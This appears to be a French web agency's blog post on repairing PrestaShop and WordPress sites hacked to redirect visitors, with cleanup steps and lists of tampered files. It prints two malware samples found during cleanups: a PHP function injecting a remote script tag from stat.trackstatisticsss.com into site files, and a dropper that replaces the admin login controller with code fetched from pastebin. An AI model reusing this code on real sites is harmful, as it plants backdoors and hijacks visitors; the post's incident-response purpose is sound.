Site Prestashop ou Wordpress hacké par un virus qui détourne les pages et renvoie vers un autre site

SEO Pour créer, rédiger et optimiser le SEO de vos pages web --> Contactez-nous


Il semble que depuis quelques temps, pas mal de sites Prestashop ou Wordpress sont hackés par un virus qui détourne leurs pages.

En gros, quand on veut aller sur ces sites, on est renvoyé vers un autre site un peu douteux..

Comment réparer le problème ?

Vous pouvez nous contacter et on s'en occupera :-))

Si vous voulez faire ça tout seul..

Téléchargez tous les fichiers de votre site, par ftp, en local (sur votre ordinateur).

Normalement si votre antivirus d'ordinateur est au point, certains fichiers devraient être "interdits" de téléchargement --> notez bien lesquels

Une fois le site téléchargé en local, scannez le avec l'antivirus que vous avez sur votre ordinateur.

Dans les cas les - graves, les fichiers "méchants" sont ajoutés aux fichiers de votre site donc il "suffit" de les supprimer (en + ils portent des noms bizarres faciles à repérer au bout d'un moment).

Ce sont souvent des fichiers .js

Dans les cas simples, ces fichiers sont dans un module ou un plugin que vous n'avez peut-être pas installé (Souvent une sorte de module pour du trafic en +)

Dans les cas + compliqués, outre les fichiers ajoutés, le virus peut avoir transformé certains fichiers comme par exemple le wp-config dans wordpress..  Il va falloir alors trouver le bout de code représentatif du fichier et le supprimer ou le remplacer.

Attention à le supprimer car il peut faire planter le fichier.

Pour trouver un bout de code représentatif du virus dans des fichiers, rien de mieux que le logiciel gratuit Grepwin .

Dans les cas très compliqués, le virus a aussi infecté la base de données donc il va falloir elle aussi la réparer avec peut-être des suppressions de tables mais aussi des corrections.

Si le problème est sous wordpress, il y a possibilité d'utiliser des plugins, donc d'agir du back-office de wordpress, pour réparer/supprimer fichiers et bases (avec par exemple le plugin Search & Replace ou WPDBSpringClean ou DB repare; en amont vous pourrez trouver les fichiers infectés avec WordFence)

Bien sûr, si vous avez un backup SAIN de votre site, il vaut mieux supprimer intégralement votre version actuelle et réinstaller le backup.

Dans un cas récent où nous avons agit, le virus était stat.trackstatisticsss.com

Il avait été introduit par un plugin qui avait changé le wp-content et ajouté un fichier à la racine, le fichier htht dont le code finissait par:

*******

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {

} else {

$l2 = "<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=222'></script>";
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {

}


}
***

Pas mal de tables de la base de données étaient vérolées.

Malheureusement, comme le propriétaire du site n'avait pas de backup, nous avons du tout nettoyer puis réinstaller les fichiers avec un dossier de plugins renommé (pour qu'il n'y ait pas de plugins) puis avec un dossier de plugins (et donc les plugins désactivés) puis réactiver les plugins un par un.

Il a fallu aussi forcer dans un premier temps le nom du site dans le wp-config afin d'éviter les redirections et de pouvoir aller dans le back-office.

Dans un autre cas récent, cette fois-ci sur Prestashop, tout venait d'un module supposé amener ou aider au trafic mais heureusement dans ce cas, les fichiers en cause étaient tous dans le module donc la suppression de celui-ci suffisait à régler le problème (même si par sécurité, on scanne tout).

Autre cas de Site Prestashop beaucoup plus complexe: le propriétaire du site n'avait plus accès à son back-office

En fait, le core de Prestashop avait été transformé. Par exemple le fichier classes/form/CustomerAddressPersister.php ou tous les fichiers suivants, qui n'étaient plus les fichiers originaux mais des faux:

/autoupgrade/backup/index.php
vendor/composer/installers/src/Composer/Installers/SilverStripeInstaller.php
vendor/composer/installers/src/Composer/Installers/DrupalInstaller.php
vendor/composer/installers/src/Composer/Installers/TYPO3CmsInstaller.php
vendor/composer/installers/src/Composer/Installers/MoodleInstaller.php
vendor/composer/installers/src/Composer/Installers/OctoberInstaller.php
vendor/composer/installers/src/Composer/Installers/CakePHPInstaller.php
vendor/composer/installers/src/Composer/Installers/KirbyInstaller.php
vendor/composer/installers/src/Composer/Installers/Installer.php
vendor/composer/installers/src/Composer/Installers/MediaWikiInstaller.php
vendor/composer/installers/src/Composer/Installers/BaseInstaller.php
vendor/composer/installers/src/Composer/Installers/WordPressInstaller.php
vendor/composer/installers/src/Composer/Installers/AsgardInstaller.php
vendor/composer/installers/src/Composer/Installers/BitrixInstaller.php
vendor/composer/installers/src/Composer/Installers/CraftInstaller.php
vendor/composer/installers/src/Composer/Installers/Concrete5Installer.php
vendor/composer/installers/src/Composer/Installers/ShopwareInstaller.php
vendor/composer/installers/src/Composer/Installers/OxidInstaller.php

Le fichier permettant de se connecter au back-office de Prestashop avait été changé avec ce code (n'allez pas sur l'adresse pastebin; on y a ajouté *** ):

<?php
error_reporting(0);
echo "XATAJAB v2020<br>";
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php")){
@unlink($_SERVER['DOCUMENT_ROOT'] . "/controllers/admin/AdminLoginController.php");
$html1=file_get_contents(https://pastebin.com/raw/DNaJ8dQm***);
if(!preg_match("/baja/i",$html1)){$html1=curl_get_contents(pastebin.com/raw/DNaJ8dQm***);}
$save=fopen("../controllers/admin/AdminLoginController.php","w");
fwrite($save,$html1);
fclose($save);
}
unlink(__FILE__);
?>

(Qui est donc Xatajab ?? :-))

Des fichiers bizarres avaient été installés: .../js/cjibyavgjr.php  ( => modif mot de passe cpanel / création serveur smtp ) et  .../js/cviuiowiwg.php

Bref, un truc bien vicieux...

Bon, encore une fois, PUB, si vous avez un problème de ce genre, n'hésitez pas à nous contacter.

 

 

Commentaires sur: Site Prestashop ou Wordpress hacké par un virus qui détourne les pages et renvoie vers un autre site

Poster un commentaire sur: Site Prestashop ou Wordpress hacké par un virus qui détourne les pages et renvoie vers un autre site







« La plate-forme de la Poste pour commander des masques s'est-elle faite pirater ? | Accueil | Application StopCovid: un flop annoncé qui a coûté combien d'argent public ? Et quel est exactement le rôle de Lunabee Studio ? »



Besoin de SEO, de développement, de rédaction de contenu web ? Besoin d'un blog, de Wordpress, de Prestashop ou autres nouvelles "choses web" ? Envie de travailler dans ces domaines ? --> Contactez-nous